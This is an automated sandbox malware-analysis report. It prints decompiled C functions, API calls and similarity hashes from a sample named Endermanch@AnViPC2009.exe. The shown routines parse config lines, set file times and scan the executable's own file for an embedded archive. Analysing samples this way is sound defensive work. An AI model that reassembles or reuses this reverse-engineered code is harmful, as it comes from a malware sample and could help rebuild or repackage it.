                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallbackDispatcherItemUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4250310104-0
                                                                                                                                                      • Opcode ID: bbf78243f25ff81acabeaf5dad315e862b771a1aca33ad464662f4ccfa4a290c
                                                                                                                                                      • Instruction ID: dc0878946e7b984a377acabc94d3e267ee30d019ea7c960415ec6777497c3dfc
                                                                                                                                                      • Opcode Fuzzy Hash: bbf78243f25ff81acabeaf5dad315e862b771a1aca33ad464662f4ccfa4a290c
                                                                                                                                                      • Instruction Fuzzy Hash: CBC04C7740C240BFCB015BA09E08D6FBFA9EB94311F00C959B5E5C0030C6758520DB16
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040B5EC(void* __edi, void* __esi, intOrPtr* _a4, CHAR* _a8, char* _a12, char* _a16, char* _a20) {
                                                                                                                                                      				char _v4100;
                                                                                                                                                      				char* _t29;
                                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                                      				char _t32;
                                                                                                                                                      				char* _t34;
                                                                                                                                                      				char* _t45;
                                                                                                                                                      				char* _t47;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                      				_t50 = __edi;
                                                                                                                                                      				E00401200(0x1000);
                                                                                                                                                      				_t29 = _a16;
                                                                                                                                                      				_t47 = _a20;
                                                                                                                                                      				if(_t29 != 0) {
                                                                                                                                                      					 *_t29 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t47 != 0) {
                                                                                                                                                      					 *_t47 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t30 = _a4;
                                                                                                                                                      				if(_t30 == 0) {
                                                                                                                                                      					L24:
                                                                                                                                                      					return 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t32 =  *_t30;
                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                      						goto L24;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t51);
                                                                                                                                                      					_t52 = 0;
                                                                                                                                                      					_t48 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						_a4 = _a4 + 1;
                                                                                                                                                      						if(_t32 != 0x3d) {
                                                                                                                                                      							if(_t32 == 0xd) {
                                                                                                                                                      								_a4 = _a4 + 1;
                                                                                                                                                      								L20:
                                                                                                                                                      								 *_a8 = 0;
                                                                                                                                                      								_t34 = _a12;
                                                                                                                                                      								if(_t34 != 0) {
                                                                                                                                                      									 *_t34 = 0;
                                                                                                                                                      									if(_t52 != 0) {
                                                                                                                                                      										ExpandEnvironmentStringsA(_t52,  &_v4100, 0x1000);
                                                                                                                                                      										_t20 = _t50 - 1; // 0xfff
                                                                                                                                                      										E0040A484(_a12,  &_v4100, _t20);
                                                                                                                                                      										 *((char*)(_a12 + _t50 - 1)) = 0;
                                                                                                                                                      										 *_t52 = 0;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								return _a4;
                                                                                                                                                      							}
                                                                                                                                                      							if(_t32 == 0xa) {
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      							L15:
                                                                                                                                                      							_a8 =  &(_a8[1]);
                                                                                                                                                      							 *_a8 = _t32;
                                                                                                                                                      							_t12 = _t50 - 2; // 0xffe
                                                                                                                                                      							if(_t48 > _t12) {
                                                                                                                                                      								 *_a20 = 1;
                                                                                                                                                      								goto L20;
                                                                                                                                                      							}
                                                                                                                                                      							goto L16;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a12 == 0 || _t52 != 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t45 = _a16;
                                                                                                                                                      							if(_t45 != 0) {
                                                                                                                                                      								 *_t45 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							_t52 = _a8;
                                                                                                                                                      						}
                                                                                                                                                      						L16:
                                                                                                                                                      						_t32 =  *_a4;
                                                                                                                                                      						_t48 = _t48 + 1;
                                                                                                                                                      					} while (_t32 != 0);
                                                                                                                                                      					goto L20;
                                                                                                                                                      				}
                                                                                                                                                      			}














                                                                                                                                                      0x0040b5ec
                                                                                                                                                      0x0040b5ec
                                                                                                                                                      0x0040b5f4
                                                                                                                                                      0x0040b5f9
                                                                                                                                                      0x0040b5fc
                                                                                                                                                      0x0040b604
                                                                                                                                                      0x0040b606
                                                                                                                                                      0x0040b606
                                                                                                                                                      0x0040b60a
                                                                                                                                                      0x0040b60c
                                                                                                                                                      0x0040b60c
                                                                                                                                                      0x0040b60e
                                                                                                                                                      0x0040b613
                                                                                                                                                      0x0040b6bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b619
                                                                                                                                                      0x0040b619
                                                                                                                                                      0x0040b61d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b623
                                                                                                                                                      0x0040b624
                                                                                                                                                      0x0040b626
                                                                                                                                                      0x0040b628
                                                                                                                                                      0x0040b628
                                                                                                                                                      0x0040b62d
                                                                                                                                                      0x0040b649
                                                                                                                                                      0x0040b672
                                                                                                                                                      0x0040b675
                                                                                                                                                      0x0040b678
                                                                                                                                                      0x0040b67a
                                                                                                                                                      0x0040b67f
                                                                                                                                                      0x0040b681
                                                                                                                                                      0x0040b685
                                                                                                                                                      0x0040b694
                                                                                                                                                      0x0040b69a
                                                                                                                                                      0x0040b6a8
                                                                                                                                                      0x0040b6b0
                                                                                                                                                      0x0040b6b4
                                                                                                                                                      0x0040b6b4
                                                                                                                                                      0x0040b685
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b6b9
                                                                                                                                                      0x0040b64d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b64f
                                                                                                                                                      0x0040b652
                                                                                                                                                      0x0040b655
                                                                                                                                                      0x0040b657
                                                                                                                                                      0x0040b65c
                                                                                                                                                      0x0040b66d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b66d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b65c
                                                                                                                                                      0x0040b632
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b638
                                                                                                                                                      0x0040b638
                                                                                                                                                      0x0040b63d
                                                                                                                                                      0x0040b63f
                                                                                                                                                      0x0040b63f
                                                                                                                                                      0x0040b642
                                                                                                                                                      0x0040b642
                                                                                                                                                      0x0040b65e
                                                                                                                                                      0x0040b661
                                                                                                                                                      0x0040b663
                                                                                                                                                      0x0040b664
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b668

                                                                                                                                                      APIs
                                                                                                                                                      • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFAD,00000000,?,?,?,?,?,?,0040D289,?), ref: 0040B694
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 237503144-0
                                                                                                                                                      • Opcode ID: 3b4c9f354597fc95f10826ea2e966bededaae85f17ead1938b10c757e2ca349c
                                                                                                                                                      • Instruction ID: 42007130aef083b3b142597f144a87f22f5210554288a476bc14d6e76700480a
                                                                                                                                                      • Opcode Fuzzy Hash: 3b4c9f354597fc95f10826ea2e966bededaae85f17ead1938b10c757e2ca349c
                                                                                                                                                      • Instruction Fuzzy Hash: FC3184351441899FCB12CE58C490AEA7BA5EB16340B04487BF981AB391C73ADD85CBEF
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E0040538C(intOrPtr __ecx, intOrPtr* _a4, signed char _a7, intOrPtr* _a8, signed char _a11, intOrPtr* _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v32;
                                                                                                                                                      				int _t32;
                                                                                                                                                      				signed char _t40;
                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                                      
                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                      				_t43 = _a4;
                                                                                                                                                      				if(_t43 == 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_a7 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a7 = 1;
                                                                                                                                                      					if( *_t43 == 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t50 = _a8;
                                                                                                                                                      				if(_t50 == 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					_a11 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a11 = 1;
                                                                                                                                                      					if( *_t50 == 0) {
                                                                                                                                                      						goto L5;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t53 = _a12;
                                                                                                                                                      				if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                      					_t40 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t40 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a7 != 0) {
                                                                                                                                                      					E0040DEF5(_t43,  &_v16);
                                                                                                                                                      				}
                                                                                                                                                      				if(_a11 != 0) {
                                                                                                                                                      					E0040DEF5(_t50,  &_v32);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t40 != 0) {
                                                                                                                                                      					E0040DEF5(_t53,  &_v24);
                                                                                                                                                      				}
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				_t32 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t40 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
                                                                                                                                                      				return _t32;
                                                                                                                                                      			}












                                                                                                                                                      0x00405392
                                                                                                                                                      0x00405395
                                                                                                                                                      0x0040539c
                                                                                                                                                      0x004053a6
                                                                                                                                                      0x004053a6
                                                                                                                                                      0x0040539e
                                                                                                                                                      0x0040539e
                                                                                                                                                      0x004053a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004053a4
                                                                                                                                                      0x004053ac
                                                                                                                                                      0x004053b1
                                                                                                                                                      0x004053bb
                                                                                                                                                      0x004053bb
                                                                                                                                                      0x004053b3
                                                                                                                                                      0x004053b3
                                                                                                                                                      0x004053b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004053b9
                                                                                                                                                      0x004053be
                                                                                                                                                      0x004053c3
                                                                                                                                                      0x004053cd
                                                                                                                                                      0x004053c9
                                                                                                                                                      0x004053c9
                                                                                                                                                      0x004053c9
                                                                                                                                                      0x004053d2
                                                                                                                                                      0x004053d8
                                                                                                                                                      0x004053d8
                                                                                                                                                      0x004053e1
                                                                                                                                                      0x004053e9
                                                                                                                                                      0x004053e9
                                                                                                                                                      0x004053f0
                                                                                                                                                      0x004053f8
                                                                                                                                                      0x004053f8
                                                                                                                                                      0x00405403
                                                                                                                                                      0x00405410
                                                                                                                                                      0x0040541e
                                                                                                                                                      0x0040542c
                                                                                                                                                      0x00405436

                                                                                                                                                      APIs
                                                                                                                                                      • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 0040542C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1425588814-0
                                                                                                                                                      • Opcode ID: 146c50b964cf072828e2af265b986e6c12e225fe6d7a5bc8241dca6fabbbd739
                                                                                                                                                      • Instruction ID: 000ebc01fd1d1047a7549c74fa2459a786f80f89ab415a8170d0cde1621a3e6d
                                                                                                                                                      • Opcode Fuzzy Hash: 146c50b964cf072828e2af265b986e6c12e225fe6d7a5bc8241dca6fabbbd739
                                                                                                                                                      • Instruction Fuzzy Hash: 69219232501549EECF15CFB8C441AFF7BA89B25380B08807BE855EB2C1E678DA54DB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00409265(signed int __eax, intOrPtr* __ecx, void* __edx, void* __esi) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				signed int _t63;
                                                                                                                                                      				void* _t65;
                                                                                                                                                      				CHAR* _t66;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                      				void* _t76;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      				char _t95;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t111;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				void* _t117;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				void* _t119;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                      				signed int _t127;
                                                                                                                                                      
                                                                                                                                                      				_t110 = __edx;
                                                                                                                                                      				_t97 = __ecx;
                                                                                                                                                      				_t63 = __eax ^ _t127;
                                                                                                                                                      				if(_t63 >= 0) {
                                                                                                                                                      					 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                      					_push( *(_t127 + 8));
                                                                                                                                                      					_t125 = __ecx;
                                                                                                                                                      					_t65 = E0040A386();
                                                                                                                                                      					_t66 = _t127 - 0x40c;
                                                                                                                                                      					if(_t65 != 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						E0040A450(_t66,  *(_t127 + 8));
                                                                                                                                                      						E00404E8A(_t127 - 0x102c);
                                                                                                                                                      						_t70 = E0040505E(_t127 - 0x102c, _t127 - 0x40c, 0, 1, 0); // executed
                                                                                                                                                      						if(_t70 != 0) {
                                                                                                                                                      							 *(_t127 + 8) =  *(_t127 + 8) | 0xffffffff;
                                                                                                                                                      							 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                                                                                      							_push(_t95);
                                                                                                                                                      							L8:
                                                                                                                                                      							while( *(_t127 + 8) == 0xffffffff) {
                                                                                                                                                      								_t80 = E00404FA3(_t127 - 0x102c, _t110); // executed
                                                                                                                                                      								 *((intOrPtr*)(_t127 - 8)) = _t80;
                                                                                                                                                      								_t82 = E00405651(_t127 - 0x102c, _t110, _t127 - 0x302c, 0x2000); // executed
                                                                                                                                                      								 *((intOrPtr*)(_t127 - 0xc)) = _t82;
                                                                                                                                                      								if(_t82 >= 0x10) {
                                                                                                                                                      									_t122 = 0;
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                      										if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A516(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A516(_t127 + _t122 - 0x302a, 0x412580, 4) != 0) {
                                                                                                                                                      											_t122 = _t122 + 1;
                                                                                                                                                      											if(_t122 <=  *((intOrPtr*)(_t127 - 0xc)) + 0xfffffff0) {
                                                                                                                                                      												continue;
                                                                                                                                                      											} else {
                                                                                                                                                      												L20:
                                                                                                                                                      												E004054B4(_t127 - 0x102c,  *((intOrPtr*)(_t127 - 0xc)) +  *((intOrPtr*)(_t127 - 8)) - 0x10, 0, 0);
                                                                                                                                                      												 *((intOrPtr*)(_t127 - 4)) =  *((intOrPtr*)(_t127 - 4)) + 1;
                                                                                                                                                      												if( *((intOrPtr*)(_t127 - 4)) < 0x40) {
                                                                                                                                                      													goto L8;
                                                                                                                                                      												} else {
                                                                                                                                                      													if( *(_t127 + 8) != 0xffffffff) {
                                                                                                                                                      														goto L22;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										goto L43;
                                                                                                                                                      									}
                                                                                                                                                      									 *(_t127 + 8) = _t122 +  *((intOrPtr*)(_t127 - 8));
                                                                                                                                                      									goto L20;
                                                                                                                                                      								}
                                                                                                                                                      								L43:
                                                                                                                                                      								_t76 = E0040503B(_t95, _t127 - 0x102c);
                                                                                                                                                      								goto L44;
                                                                                                                                                      							}
                                                                                                                                                      							L22:
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t95 = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                      							E004054B4(_t127 - 0x102c,  *(_t127 + 8), _t110, 0);
                                                                                                                                                      							_t75 = E0040A1C5( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                      							 *_t125 = _t75;
                                                                                                                                                      							if(_t75 != 0) {
                                                                                                                                                      								 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                      								_t77 = E00405651(_t127 - 0x102c, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                      								_t104 = 0;
                                                                                                                                                      								 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                      								if(_t77 > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t79 =  *_t125;
                                                                                                                                                      										_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                      										_t95 = _t95 + 1;
                                                                                                                                                      										if(_t111 == 0) {
                                                                                                                                                      											goto L42;
                                                                                                                                                      										}
                                                                                                                                                      										if(_t111 != 0x5c) {
                                                                                                                                                      											if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                      												_t111 = 0xc;
                                                                                                                                                      											}
                                                                                                                                                      											goto L40;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                      											if(_t116 == 0) {
                                                                                                                                                      												 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                      												goto L36;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t117 = _t116 - 0x3a;
                                                                                                                                                      												if(_t117 == 0) {
                                                                                                                                                      													 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                      													goto L36;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t118 = _t117 - 0x12;
                                                                                                                                                      													if(_t118 == 0) {
                                                                                                                                                      														 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                      														goto L36;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t119 = _t118 - 4;
                                                                                                                                                      														if(_t119 == 0) {
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                      															goto L36;
                                                                                                                                                      														} else {
                                                                                                                                                      															if(_t119 != 0) {
                                                                                                                                                      																L40:
                                                                                                                                                      																 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                      															} else {
                                                                                                                                                      																 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                      																L36:
                                                                                                                                                      																_t95 = _t95 + 1;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										_t104 = _t104 + 1;
                                                                                                                                                      										if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										goto L42;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								L42:
                                                                                                                                                      								 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                      								 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                      							}
                                                                                                                                                      							goto L43;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t76 = E0040503B(_t95, _t127 - 0x102c);
                                                                                                                                                      						}
                                                                                                                                                      						L44:
                                                                                                                                                      					} else {
                                                                                                                                                      						GetModuleFileNameA(0, _t66, 0x400);
                                                                                                                                                      						_t76 = E0040A3B2(_t97, _t127 - 0x40c, 0x5c);
                                                                                                                                                      						if(_t76 != 0) {
                                                                                                                                                      							_t66 = _t76 + 1;
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t76;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *_t63 =  *_t63 + _t63;
                                                                                                                                                      					return _t63;
                                                                                                                                                      				}
                                                                                                                                                      			}

























                                                                                                                                                      0x00409265
                                                                                                                                                      0x00409265
                                                                                                                                                      0x00409265
                                                                                                                                                      0x00409267
                                                                                                                                                      0x00409278
                                                                                                                                                      0x0040927c
                                                                                                                                                      0x0040927f
                                                                                                                                                      0x00409281
                                                                                                                                                      0x00409288
                                                                                                                                                      0x0040928e
                                                                                                                                                      0x004092b5
                                                                                                                                                      0x004092b9
                                                                                                                                                      0x004092c5
                                                                                                                                                      0x004092dd
                                                                                                                                                      0x004092e4
                                                                                                                                                      0x004092f6
                                                                                                                                                      0x004092fa
                                                                                                                                                      0x004092fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092fe
                                                                                                                                                      0x0040930e
                                                                                                                                                      0x00409313
                                                                                                                                                      0x00409328
                                                                                                                                                      0x0040932d
                                                                                                                                                      0x00409333
                                                                                                                                                      0x00409339
                                                                                                                                                      0x0040933b
                                                                                                                                                      0x0040933b
                                                                                                                                                      0x00409345
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x00409397
                                                                                                                                                      0x0040939d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040939f
                                                                                                                                                      0x004093a9
                                                                                                                                                      0x004093be
                                                                                                                                                      0x004093c3
                                                                                                                                                      0x004093ca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093d0
                                                                                                                                                      0x004093d4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093d4
                                                                                                                                                      0x004093ca
                                                                                                                                                      0x0040939d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x004093a6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093a6
                                                                                                                                                      0x00409496
                                                                                                                                                      0x0040949c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x004093da
                                                                                                                                                      0x004093dd
                                                                                                                                                      0x004093de
                                                                                                                                                      0x004093e9
                                                                                                                                                      0x004093f0
                                                                                                                                                      0x004093fe
                                                                                                                                                      0x00409403
                                                                                                                                                      0x00409407
                                                                                                                                                      0x00409410
                                                                                                                                                      0x0040941e
                                                                                                                                                      0x00409423
                                                                                                                                                      0x00409427
                                                                                                                                                      0x0040942a
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942e
                                                                                                                                                      0x00409432
                                                                                                                                                      0x00409435
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040943a
                                                                                                                                                      0x0040947a
                                                                                                                                                      0x00409483
                                                                                                                                                      0x00409483
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040943c
                                                                                                                                                      0x00409440
                                                                                                                                                      0x00409443
                                                                                                                                                      0x00409470
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409445
                                                                                                                                                      0x00409445
                                                                                                                                                      0x00409448
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944d
                                                                                                                                                      0x00409464
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040944f
                                                                                                                                                      0x0040944f
                                                                                                                                                      0x00409452
                                                                                                                                                      0x0040945e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409454
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409484
                                                                                                                                                      0x00409484
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409452
                                                                                                                                                      0x0040944d
                                                                                                                                                      0x00409448
                                                                                                                                                      0x00409443
                                                                                                                                                      0x00409487
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040948d
                                                                                                                                                      0x0040948f
                                                                                                                                                      0x00409493
                                                                                                                                                      0x00409493
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092e6
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x004094a2
                                                                                                                                                      0x00409290
                                                                                                                                                      0x00409298
                                                                                                                                                      0x004092a7
                                                                                                                                                      0x004092ae
                                                                                                                                                      0x004092b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092b4
                                                                                                                                                      0x004092ae
                                                                                                                                                      0x004094a5
                                                                                                                                                      0x00409269
                                                                                                                                                      0x00409269
                                                                                                                                                      0x0040926b
                                                                                                                                                      0x0040926b

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098C5,?,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D489,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 00409298
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                      • Opcode ID: 800b57ff41e805e7445b3dab751615107b614ecf42a5428cb65f6f673774a40b
                                                                                                                                                      • Instruction ID: 1dd8b412e6f1353a2516ce6a751c9eb078f520cbb25ae75f9212370612d0c546
                                                                                                                                                      • Opcode Fuzzy Hash: 800b57ff41e805e7445b3dab751615107b614ecf42a5428cb65f6f673774a40b
                                                                                                                                                      • Instruction Fuzzy Hash: B401D4B6500204A9DF20AB32DC45EEF3778DB91354F0085BBFB06B50C1DA789E49C969
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
